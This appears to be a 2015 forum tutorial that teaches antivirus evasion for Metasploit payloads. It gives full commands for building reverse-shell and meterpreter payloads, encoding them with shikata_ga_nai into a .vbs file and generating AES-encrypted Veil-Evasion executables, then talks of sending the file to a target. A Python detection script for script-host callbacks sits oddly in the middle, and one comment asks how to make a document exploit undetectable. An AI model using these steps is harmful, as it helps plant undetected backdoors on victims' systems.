Tutorial: Evading Anti-Virus Software While Hacking

June 22, 2015 | Views: 23139


Hello,

When it comes to "hacking" into our target's system, where most of us fail is evading their Anti-Virus (AV).

In this tutorial, I'll be teaching you various ways to actually bypass the AV, so you can have a meterpreter session running on your target's system without the Anti-Virus flagging your software.

AV software companies generally develop their software to look for a "signature" of viruses and other malware. In most instances, they look at the first few lines of code for a familiar pattern of known malware. When they find malware in the wild, they simply add its signature to their virus/malware database. When the software next encounters that malware, it alerts the computer owner.

 

First, the Prerequisites:

1. Kali Linux

2. A quick scan of the target's AV (which AV they are using, etc.)

 

Let’s get started!

METHOD 1: Changing the Payload into a C Program

In this method, we're going to exploit the target's system by changing our Metasploit payload into a C language payload so that the AV won't flag it as suspicious.

STEP 1: Open up Kali and run msfconsole

 

STEP 2: Generate an exploit in C

We're going to generate the payload as C source:

msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 LPORT=4441 C

 

Notice I've appended the command with a capital "C". This C tells msfpayload to emit the payload as C source. Once we've done that, we get output similar to this:

 

STEP 3: Generating a binary executable

Finally, we need to generate a binary executable for the shellcode, which we can use in our client-side attack:

msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 X > setup.exe

We've created an executable file by using the X option, written it to the current folder and named the file setup.exe.
We can use this new payload in a client-side attack. The target's AV software is unlikely to have a signature for it, allowing us to stealthily place this backdoor/listener on their system.

 

METHOD 2: Encoding our Payload

We're going to change our signature by encoding it. So, let's get started.

STEP 1: Fire up Kali and run msfconsole

 

STEP 2: Using msfencode

Let's run msfencode -l to view the list of encoders available to us.

We can see a lot of encoders to choose from.

Fourth from the bottom, you can see an encoder named "shikata_ga_nai".

Note: It's rated "excellent" and it's a "Polymorphic XOR Additive Feedback Encoder". Let's use that one.

What's shikata_ga_nai? This Japanese phrase translates to "nothing can be done about it." Great name for an encoder, huh? Further, it's an additive XOR polymorphic encoder. This means that it changes its shape/signature (polymorphic) by using an XOR encoding scheme with additive feedback. XOR is far from a perfect encryption scheme, but it's efficient and can generate many different shapes/signatures quickly, each of which the code decodes itself once it arrives on the target.

 

STEP 3: Re-coding our Payload with the encoder

Let's use shikata_ga_nai to re-encode our reverse TCP shell to get it past AV software. In MSF we type:

msfpayload windows/shell/reverse_tcp LHOST=192.168.1.101 R | msfencode -e x86/shikata_ga_nai -c 20 -t vbs > /root/cybrary_it.vbs

Here, the pipe (|) takes the raw payload (the R option) and feeds it into msfencode with the following parameters:

msfencode -e x86/shikata_ga_nai -c 20 -t vbs means: re-encode that payload with shikata_ga_nai, run the encoder 20 times (-c 20), and output the result as a .vbs script (-t vbs).

Finally, the redirect saves it in /root under the file name cybrary_it.vbs.

 

When we check our root folder, we find this:

It's just a matter of minutes to send the file to our target and have them open it, and boom, we've got their system.
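From the defender's side, the delivery step just described leaves a recognisable trace: a script host such as wscript.exe starts a .vbs from a user-writable folder and, seconds later, the same process opens an outbound connection. The detection logic below is an added example, not part of the original post; the log lines are constructed to resemble endpoint process-creation and network telemetry, and the pipe-separated field layout is an assumption rather than any product's real format.

```python
"""Correlate script-host execution from a user-writable path with a
follow-on outbound connection from the same process.

Added detection example; the telemetry below is constructed and the
"time|event|pid|image|detail" layout is an assumed, simplified format.
"""
from datetime import datetime, timedelta

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Folders an ordinary user can write to. A script launched from here is
# more suspicious than one under Program Files or the Windows directory.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\")
WINDOW = timedelta(seconds=60)  # how soon after launch a callback counts

# Constructed telemetry: one process-creation or network event per line.
SAMPLE_LOG = r"""
2015-06-22T10:00:01|process|4120|C:\Windows\System32\wscript.exe|C:\Users\bob\Downloads\cybrary_it.vbs
2015-06-22T10:00:03|network|4120|C:\Windows\System32\wscript.exe|203.0.113.10:4444
2015-06-22T10:05:00|process|5010|C:\Windows\System32\cscript.exe|C:\Program Files\Vendor\inventory.vbs
2015-06-22T10:05:02|network|5010|C:\Windows\System32\cscript.exe|10.0.0.5:443
2015-06-22T10:09:00|process|6001|C:\Windows\System32\wscript.exe|C:\Users\amy\AppData\Local\Temp\logon.vbs
"""


def parse(log_text: str) -> list:
    """Turn the pipe-separated lines into event dicts; image is reduced to
    its lower-cased file name so matching is path- and case-insensitive."""
    events = []
    for line in log_text.strip().splitlines():
        ts, kind, pid, image, detail = line.split("|", 4)
        events.append({
            "time": datetime.fromisoformat(ts),
            "kind": kind,
            "pid": int(pid),
            "image": image.rsplit("\\", 1)[-1].lower(),
            "detail": detail,
        })
    return events


def detect(log_text: str) -> list:
    """Return (severity, pid, message) tuples.

    high:   script host ran a script from a user-writable path and the same
            PID opened an outbound connection within WINDOW.
    medium: script host ran a script from a user-writable path, no callback
            seen (yet)."""
    events = parse(log_text)
    alerts = []
    for ev in events:
        if ev["kind"] != "process" or ev["image"] not in SCRIPT_HOSTS:
            continue
        script = ev["detail"]
        if not any(p in script.lower() for p in USER_WRITABLE):
            continue
        beacon = next(
            (n for n in events
             if n["kind"] == "network" and n["pid"] == ev["pid"]
             and ev["time"] <= n["time"] <= ev["time"] + WINDOW),
            None,
        )
        if beacon is not None:
            delay = (beacon["time"] - ev["time"]).seconds
            alerts.append(("high", ev["pid"],
                           f"{ev['image']} ran {script} then connected to "
                           f"{beacon['detail']} after {delay}s"))
        else:
            alerts.append(("medium", ev["pid"],
                           f"{ev['image']} ran {script} from a user-writable path"))
    return alerts


if __name__ == "__main__":
    for severity, pid, message in detect(SAMPLE_LOG):
        print(f"[{severity}] pid {pid}: {message}")
```

On the constructed sample this raises a high-severity alert for the Downloads-folder script that called back to port 4444 within two seconds, a medium one for the script run from a Temp folder with no connection observed, and nothing for the vendor script under Program Files. Real telemetry should correlate on a process GUID rather than a bare PID, since PIDs are reused, and the user-writable path list is a starting point, not a complete one.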


METHOD 3: Using Veil-Evasion

In this final method (of this tutorial; I can't post all 50 methods, LOL) we're going to evade the AV one last time by using Veil-Evasion.

Veil-Evasion was specifically developed to enable you to change the signature of your payload. It is written in Python, but has numerous encoders to enable you to rewrite your code to evade detection in multiple ways.

 

STEP 1: Installing Veil-Evasion

First, we need to install it.

Type:

root@kali > apt-get install veil-evasion

 

STEP 2: Opening Veil Evasion

To open our freshly installed Veil-Evasion, just type:

root@kali > veil-evasion

 

When we type that, we get this:

Veil will now begin its installation.

It will ask you whether you want to install dependencies; type "Y" for yes. Next, Veil-Evasion will begin to download all its dependencies. This can take a while, so be patient. Eventually, Veil-Evasion will ask you whether you want to install Python for Windows. Select "Install for all users" and click the "Next" button. Continue to click "Next" through several screens until you finally come to a window with the "Finish" button. Click it. Eventually, you will arrive at the screen below. We're ready to use Veil-Evasion to create a nearly undetectable payload.

 

STEP 3: Creating an EXE Payload


Let's type "list", which lists all of the payloads that Veil-Evasion can work with.


STEP 4: Choosing a Payload

In this case, let's use ruby/meterpreter/rev_tcp, which is number 44.

Let’s type: > use 44

When we do so, Veil-Evasion will come back with a screen like below asking us to set the options.


We’ll need to set LHOST and LPORT:

> set LHOST 192.168.1.101

> set LPORT 4444

Of course, use the appropriate IP address and port for your circumstances.

 

Next, we need to tell Veil-Evasion to generate the executable.

> generate


As you can see in the screenshot above, Veil-Evasion has generated a new .exe file that I have named "newpayload.exe".

 

 

STEP 5: Generating an encrypted Payload to bypass AV

Next, let's attempt to create an encrypted payload that we can get past AV software and other security devices. In this case, we'll use a different payload from the payload list, namely python/shellcode_inject/aes_encrypt.

This payload type uses VirtualAlloc injection, which creates an executable area in memory for the shellcode and then locks that memory area in physical memory.

This is number 32 on our payload list, so type: > info 32

It then returns info on this payload, as seen below.

This payload uses VirtualAlloc injection in conjunction with AES encryption (AES is the Advanced Encryption Standard, generally regarded as among the strongest encryption available) to obfuscate its true nature from AV software and other security devices.

 

Next, let’s tell Veil-Evasion we want to use this payload.

> use 32

Here, we have the option to change the default options if we care to. For now, let’s leave the default options as they are.

Then, let's tell Veil-Evasion we want to generate this encrypted payload:

> generate

When we do so, it will use the default payload windows/meterpreter/reverse_tcp and then prompt us for the LHOST and LPORT.

 

 

When we finish entering the appropriate information for our payload, it will begin to generate the shellcode.

This can take a few minutes, so be patient. Next, Veil-Evasion will prompt us for what we want to name our payload. You can use whatever name your heart desires, but I used the simple "veilpayload".

 

Finally, Veil-Evasion will complete its work and present us with the finished product, as we see below.

 

Summary:

There are a lot of ways you can bypass an AV. These are the most used methods by me and my team. If you are stuck in any method or if you have any suggestions/comments/queries, feel free to message me 😉 — xMidnightSnowx

35 Comments
  1. Nice write up!

  2. Hello bro, how to encrypt a Python exploit?
    I want to encrypt a Python exploit (CVE-2015-1641 (.doc packed file)) built with a Python script, so it can be FUD. Have you ever done it? Can Veil-Evasion do it, or is it only for Metasploit exploits?

    Any other tool or hint that encrypts this exploit?
    Thanks.

  3. This is a great tutorial, thank you.

  4. Bro, many thanks for your share; this is useful information.
    Also we can see you really took the time to try and explain it as simply as it can get.

    Cheers for you and keep up the good work 🙂 Here are some Cybytes tips for you, bro 🙂

  5. This is too cool going through it!!!
